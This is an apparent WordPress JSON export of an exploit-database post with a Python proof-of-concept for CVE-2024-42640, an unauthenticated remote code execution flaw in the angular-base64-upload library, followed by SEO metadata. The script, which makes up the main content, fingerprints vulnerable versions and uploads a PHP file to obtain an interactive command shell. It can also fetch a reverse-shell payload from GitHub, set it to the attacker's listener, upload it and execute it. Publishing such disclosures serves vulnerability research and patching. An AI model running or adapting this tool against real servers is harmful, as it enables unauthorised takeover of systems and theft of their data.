\n# Exploit Title: Angular-Base64-Upload Library 0.1.21 – Unauthenticated Remote Code Execution (RCE)
\n
# Date: 10 October 2024
\n
# Discovered by : Ravindu Wickramasinghe | rvz (@rvizx9)
\n
# Exploit Author: Ravindu Wickramasinghe | rvz (@rvizx9)
\n
# Vendor Homepage: https:\/\/www.npmjs.com\/package\/angular-base64-upload
\n
# Software Link: https:\/\/github.com\/adonespitogo\/angular-base64-upload
\n
# Version: prior to v0.1.21
\n
# Tested on: Arch Linux
\n
# CVE : CVE-2024-42640
\n
# Severity: Critical – 10.0 (CVSS 4.0)
\n
# Github Link : https:\/\/github.com\/rvizx\/CVE-2024-42640
\n
# Blog Post : https:\/\/www.zyenra.com\/blog\/unauthenticated-rce-in-angular-base64-upload.html<\/p>\n
import re
\n
import subprocess
\n
import requests
\n
import sys
\n
import os
\n
import uuid
\n
import base64
\n
import cmd
\n
from urllib.parse import urlparse<\/p>\n
def banner():
\n
print(”’<\/p>\n
\\033[2mCVE-2024-42640\\033[0m – Unauthenticated RCE via Anuglar-Base64-Upload Library \\033[2m PoC Exploit
\n
\\033[0mRavindu Wickramasinghe\\033[2m | rvz (\u30e9\u30f4\u30a3\u30ba) – twitter: @rvizx9
\n
https:\/\/github.com\/rvizx\/\\033[0mCVE-2024-42640<\/p>\n
”’)<\/p>\n
def check_version(target):
\n
response = requests.get(target)
\n
first_line = response.text.splitlines()[0].strip()
\n
match = re.search(r’v0\\.(1|0)\\.(\\d+)’, first_line)<\/p>\n
if match:
\n
version = match.group(0)
\n
x_value = int(match.group(1))
\n
if x_value <= 20:\n
print(f”\\033[94m[inf]:\\033[0m target is using a vulnerable version. [version]: {version}”)
\n
else:
\n
print(f”\\033[91m[err]:\\033[0m target is not vulnerable [version]: {version}”)
\n
exit()
\n
else:
\n
print(“\\033[91m[err]:\\033[0m couldn’t find the version”)<\/p>\n
def enum(url):
\n
print(“\\033[94m[inf]:\\033[0m enumerating… “)
\n
target = f”{url}\/bower_components\/angular-base64-upload\/dist\/angular-base64-upload.min.js”
\n
r = requests.head(target)
\n
if r.status_code == 200:
\n
print(“\\033[94m[inf]:\\033[0m target is using bower_components”)
\n
check_version(target)
\n
else:
\n
print(“\\033[94m[inf]:\\033[0m target is not using bower_components”)
\n
target = f”{url}\/node_modules\/angular-base64-upload\/dist\/angular-base64-upload.min.js”
\n
r = requests.head(target)
\n
if r.status_code == 200:
\n
print(“\\033[94m[inf]:\\033[0m target is using node_modules”)
\n
check_version(target)
\n
else:
\n
print(“\\033[94m[inf]:\\033[0m target is not using node_modules”)
\n
print(“\\033[91m[err]:\\033[0m an error occured, it was not possible to enumerate for dist\/angular-base64-upload.min.js”)
\n
print(“\\033[93m[ins]:\\033[0m please make sure you’ve defined the target to the endpoint prior to the depdency installation directory”)
\n
print(“\\033[93m[ins]:\\033[0m for manual exploitation, please refer to this: https:\/\/www.zyenra.com\/blog\/unauthenticated-rce-in-angular-base64-upload.html”)
\n
print(“\\033[91m[err]:\\033[0m exiting..”)
\n
exit()
\n
exploit(target)<\/p>\n
class CmdShell(cmd.Cmd):
\n
username = subprocess.check_output(“whoami”, shell=True).strip().decode()
\n
domain = urlparse(sys.argv[1]).netloc
\n
prompt = f”{username}@{domain} > ”<\/p>\n
def __init__(self, payload_url):
\n
super().__init__()
\n
self.payload_url = payload_url<\/p>\n
def default(self, line):
\n
url = f”{self.payload_url}?cmd={line}”
\n
try:
\n
response = requests.get(url)
\n
print(response.text)
\n
except requests.RequestException as e:
\n
print(“\\033[91m[err]:\\033[0m {e}”)<\/p>\n
def do_exit(self, arg):
\n
return True<\/p>\n
def exploit(target):
\n
print(f”[dbg]: {target}”)
\n
target_server_url = target.replace(“dist\/angular-base64-upload.min.js”,”demo\/server.php”)
\n
print(f”[dbg]: {target_server_url}”)
\n
payload_name = str(uuid.uuid4())+”.php”
\n
if len(sys.argv) > 2:
\n
if sys.argv[2] == “–rev”:
\n
revshell = “https:\/\/raw.githubusercontent.com\/pentestmonkey\/php-reverse-shell\/master\/php-reverse-shell.php”
\n
print(“\\033[94m[inf]:\\033[0m generating a php reverse shell to upload..”)
\n
ip = input(“\\033[93m[ins]:\\033[0m enter listener ip \/ domain: “)
\n
port = input(“\\033[93m[ins]:\\033[0m enter listenter port: “)
\n
print(f”\\033[93m[ins]:\\033[0m start a listener, execute nc -lvnp {port}”)
\n
input(“\\033[93m[ins]:\\033[0m press enter to continue…”)
\n
print(“\\033[94m[inf]:\\033[0m downloading php-reverse-shell from github\/pentestmonkey…”)
\n
response = requests.get(revshell)
\n
if response.status_code == 200:
\n
payload = response.text.replace(“127.0.0.1”, ip).replace(“1234”, port) # replacing default values with user input
\n
with open(payload_name, “w”) as file:
\n
file.write(payload)
\n
payload_url = upload_to_server(payload_name,target_server_url)
\n
print(“\\033[94m[inf]:\\033[0m executing the uploaded reverse-shell..”)
\n
r = requests.get(payload_url)
\n
if r.status_code == 200:
\n
print(“\\033[94m[inf]:\\033[0m process complete!”)
\n
else:
\n
print(“\\033[91m[err]:\\033[0m something went wrong!”)
\n
print(“\\033[93m[ins]:\\033[0m please check the listener for incoming connections.”)
\n
else:
\n
print(“\\033[91m[err]:\\033[0m failed to fetch the php-reverse-shell.”)
\n
print(“\\033[91m[err]:\\033[0m exiting..”)
\n
exit()<\/p>\n
else:
\n
payload = “”
\n
with open(payload_name, “w”) as file:
\n
file.write(payload)
\n
payload_url = upload_to_server(payload_name,target_server_url)
\n
cmd_shell = CmdShell(payload_url)
\n
cmd_shell.cmdloop()<\/p>\n
def upload_to_server(payload_name,target_server_url):
\n
try:
\n
with open(payload_name, ‘rb’) as file:
\n
file_content = file.read()
\n
base64_payload = base64.b64encode(file_content).decode(‘utf-8’)<\/p>\n
headers = {
\n
‘Content-Type’: ‘application\/json’,
\n
}<\/p>\n
json_data = {
\n
‘base64’: base64_payload,
\n
‘filename’: payload_name,
\n
}<\/p>\n
response = requests.post(target_server_url, headers=headers, json=json_data, verify=False)
\n
print(“\\033[94m[inf]:\\033[0m file upload request sent! [status-code]: “,response.status_code)
\n
updemo_endpoint = f”uploads\/{payload_name}”
\n
print(f”[dbg]: {updemo_endpoint}”)
\n
payload_url = target_server_url.replace(“server.php”,updemo_endpoint)
\n
print(f”[dbg]: {payload_url}”)
\n
if response.status_code == 200:
\n
print(f”\\033[94m[inf]:\\033[0m payload is uploaded to {payload_url}”)
\n
return payload_url
\n
else:
\n
print(“\\033[91m[err]:\\033[0m something went wrong! failed to upload the payload to server”)
\n
exit()
\n
except Exception as e:
\n
print(f”\\033[91m[err]:\\033[0m {e}”)
\n
exit()<\/p>\n
if __name__ == “__main__”:
\n
try:
\n
banner()
\n
if len(sys.argv) > 1:
\n
url = sys.argv[1]
\n
print(f”\\033[94m[inf]:\\033[0m target: {url}”)
\n
enum(url)
\n
else:
\n
print(“[usg]: .\/exploit.py “)
\n
print(“[usg]: .\/exploit.py –rev”)
\n
exit()
\n
except Exception as e:
\n
print(f”\\033[91m[err]:\\033[0m {e}”)
\n
exit()\n<\/div>\nView Full Exploit Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"Exploit Details Basic Information Exploit Title Angular-Base64-Upload Library 0.1.21 – Unauthenticated Remote Code Execution (RCE) Exploit ID EDB-ID:52253 Type exploitdb Published 2025-04-17T00:00:00 Modified 2025-04-17T00:00:00 CVSS…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,40,13,7,11,5],"class_list":["post-723","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-exploitdb","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n
Angular-Base64-Upload Library 0.1.21 - Unauthenticated Remote Code Execution (RCE) - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=723\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Angular-Base64-Upload Library 0.1.21 - Unauthenticated Remote Code Execution (RCE) - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Exploit Details Basic Information Exploit Title Angular-Base64-Upload Library 0.1.21 – Unauthenticated Remote Code Execution (RCE) Exploit ID EDB-ID:52253 Type exploitdb Published 2025-04-17T00:00:00 Modified 2025-04-17T00:00:00 CVSS...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=723\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-04-19T20:34:47+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=723#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=723\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Angular-Base64-Upload Library 0.1.21 – Unauthenticated Remote Code Execution (RCE)\",\"datePublished\":\"2025-04-19T20:34:47+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=723\"},\"wordCount\":632,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"exploitdb\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=723#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=723\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=723\",\"name\":\"Angular-Base64-Upload Library 0.1.21 - Unauthenticated Remote Code Execution (RCE) - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-04-19T20:34:47+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=723#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=723\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=723#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Angular-Base64-Upload Library 0.1.21 – Unauthenticated Remote Code Execution (RCE)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Angular-Base64-Upload Library 0.1.21 - Unauthenticated Remote Code Execution (RCE) - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=723","og_locale":"en_US","og_type":"article","og_title":"Angular-Base64-Upload Library 0.1.21 - Unauthenticated Remote Code Execution (RCE) - zero redgem","og_description":"Exploit Details Basic Information Exploit Title Angular-Base64-Upload Library 0.1.21 – Unauthenticated Remote Code Execution (RCE) Exploit ID EDB-ID:52253 Type exploitdb Published 2025-04-17T00:00:00 Modified 2025-04-17T00:00:00 CVSS...","og_url":"https:\/\/zero.redgem.net\/?p=723","og_site_name":"zero redgem","article_published_time":"2025-04-19T20:34:47+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=723#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=723"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Angular-Base64-Upload Library 0.1.21 – Unauthenticated Remote Code Execution (RCE)","datePublished":"2025-04-19T20:34:47+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=723"},"wordCount":632,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","exploitdb","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=723#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=723","url":"https:\/\/zero.redgem.net\/?p=723","name":"Angular-Base64-Upload Library 0.1.21 - Unauthenticated Remote Code Execution (RCE) - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-04-19T20:34:47+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=723#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=723"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=723#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Angular-Base64-Upload Library 0.1.21 – Unauthenticated Remote Code Execution (RCE)"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/723","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=723"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/723\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=723"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=723"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=723"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}